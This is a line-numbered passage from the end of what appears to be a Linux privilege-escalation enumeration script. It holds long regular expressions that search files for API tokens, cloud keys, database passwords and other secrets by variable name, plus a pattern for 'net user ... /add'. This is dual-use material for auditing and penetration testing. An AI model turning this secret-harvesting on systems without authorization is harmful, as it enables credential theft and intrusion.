okta_oauth2_clientsecret|onesignal_api_key|onesignal_user_auth_key|open_whisk_key|openwhisk_key|org_gradle_project_sonatype_nexus_password| org_project_gradle_sonatype_nexus_password|os_auth_url|os_password|ossrh_jira_password|ossrh_pass|ossrh_password|ossrh_secret| ossrh_username|packagecloud_token|pagerduty_apikey|parse_js_key|passwordtravis|paypal_client_secret|percy_project|percy_token|personal_key| personal_secret|pg_database|pg_host|places_api_key|places_apikey|plotly_apikey|plugin_password|postgresql_db|postgresql_pass| postgres_env_postgres_db|postgres_env_postgres_password|preferred_username|pring_mail_username|private_signing_password|prod_access_key_id| prod_password|prod_secret_key|project_config|publish_access|publish_key|publish_secret|pushover_token|pypi_passowrd|qiita_token| quip_token|rabbitmq_password|randrmusicapiaccesstoken|redis_stunnel_urls|rediscloud_url|refresh_token|registry_pass|registry_secure| release_gh_token|release_token|reporting_webdav_pwd|reporting_webdav_url|repotoken|rest_api_key|rinkeby_private_key|ropsten_private_key| route53_access_key_id|rtd_key_pass|rtd_store_pass|rubygems_auth_token)[a-z0-9_ .,<\\-]{0,25}(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([0-9a-zA-Z_=\\-]{8,64})['\"]" 
  12914     search_for_regex "Generic API tokens search (S-Z)" "(s3_access_key|s3_access_key_id|s3_bucket_name_app_logs|s3_bucket_name_assets|s3_external_3_amazonaws_com|s3_key| s3_key_app_logs|s3_key_assets|s3_secret_app_logs|s3_secret_assets|s3_secret_key|s3_user_secret|sacloud_access_token| sacloud_access_token_secret|sacloud_api|salesforce_bulk_test_password|salesforce_bulk_test_security_token| sandbox_access_token|sandbox_aws_access_key_id|sandbox_aws_secret_access_key|sauce_access_key|scrutinizer_token|sdr_token|secret_0| secret_1|secret_10|secret_11|secret_2|secret_3|secret_4|secret_5|secret_6|secret_7|secret_8|secret_9|secret_key_base|secretaccesskey| secret_key_base|segment_api_key|selion_log_level_dev|selion_selenium_host|sendgrid|sendgrid_api_key|sendgrid_key|sendgrid_password|sendgrid_user| sendgrid_username|sendwithus_key|sentry_auth_token|sentry_default_org|sentry_endpoint|sentry_secret|sentry_key|service_account_secret|ses_access_key| ses_secret_key|setdstaccesskey|setdstsecretkey|setsecretkey|signing_key|signing_key_password|signing_key_secret|signing_key_sid|slash_developer_space| slash_developer_space_key|slate_user_email|snoowrap_client_secret|snoowrap_password|snoowrap_refresh_token|snyk_api_token|snyk_token| socrata_app_token|socrata_password|sonar_organization_key|sonar_project_key|sonar_token|sonatype_gpg_key_name|sonatype_gpg_passphrase| sonatype_nexus_password|sonatype_pass|sonatype_password|sonatype_token_password|sonatype_token_user|sonatypepassword|soundcloud_client_secret| soundcloud_password|spaces_access_key_id|spaces_secret_access_key|spotify_api_access_token|spotify_api_client_secret|spring_mail_password|sqsaccesskey| sqssecretkey|square_reader_sdk_repository_password|srcclr_api_token|sshpass|ssmtp_config|staging_base_url_runscope|star_test_aws_access_key_id| star_test_bucket|star_test_location|star_test_secret_access_key|starship_account_sid|starship_auth_token|stormpath_api_key_id|stormpath_api_key_secret| strip_publishable_key|strip_secret_key|stripe_private|stripe_public|surge_login|surge_token|svn_pass|tesco_api_key|test_github_token| test_test|tester_keys_password|thera_oss_access_key|token_core_java|travis_access_token|travis_api_token|travis_branch|travis_com_token|travis_e2e_token| travis_gh_token|travis_pull_request|travis_secure_env_vars|travis_token|trex_client_token|trex_okta_client_token|twilio_api_key|twilio_api_secret| twilio_chat_account_api_service|twilio_configuration_sid|twilio_sid|twilio_token|twine_password|twitter_consumer_key|twitter_consumer_secret|twitteroauthaccesssecret| twitteroauthaccesstoken|unity_password|unity_serial|urban_key|urban_master_secret|urban_secret|us_east_1_elb_amazonaws_com|use_ssh| user_assets_access_key_id|user_assets_secret_access_key|usertravis|v_sfdc_client_secret|v_sfdc_password|vip_github_build_repo_deploy_key|vip_github_deploy_key| vip_github_deploy_key_pass|virustotal_apikey|visual_recognition_api_key|vscetoken|wakatime_api_key|watson_conversation_password|watson_device_password| watson_password|widget_basic_password|widget_basic_password_2|widget_basic_password_3|widget_basic_password_4|widget_basic_password_5|widget_fb_password| widget_fb_password_2|widget_fb_password_3|widget_test_server|wincert_password|wordpress_db_password|wordpress_db_user|wpjm_phpunit_google_geocode_api_key| wporg_password|wpt_db_password|wpt_db_user|wpt_prepare_dir|wpt_report_api_key|wpt_ssh_connect|wpt_ssh_private_key_base64|www_googleapis_com| yangshun_gh_password|yangshun_gh_token|yt_account_client_secret|yt_account_refresh_token|yt_api_key|yt_client_secret|yt_partner_client_secret| yt_partner_refresh_token|yt_server_api_key|zensonatypepassword|zhuliang_gh_token|zopim_account_key)[a-z0-9_ .,<\\-]{0,25}(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([0-9a-zA-Z_=\\-]{8,64})['\"]" 
  12915     search_for_regex "Net user add" "net user .+ /add" 
  12916     echo ''
  12917 
  12918 
  12919 else
  12920     echo "Regexes to search for API keys aren't activated, use param '-r' "
  12921 fi
  12922 
  12923 fi
  12924 
  12925 fi
  12926 
  12927 fi
  12928 echo ''
  12929 echo ''
  12930 if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi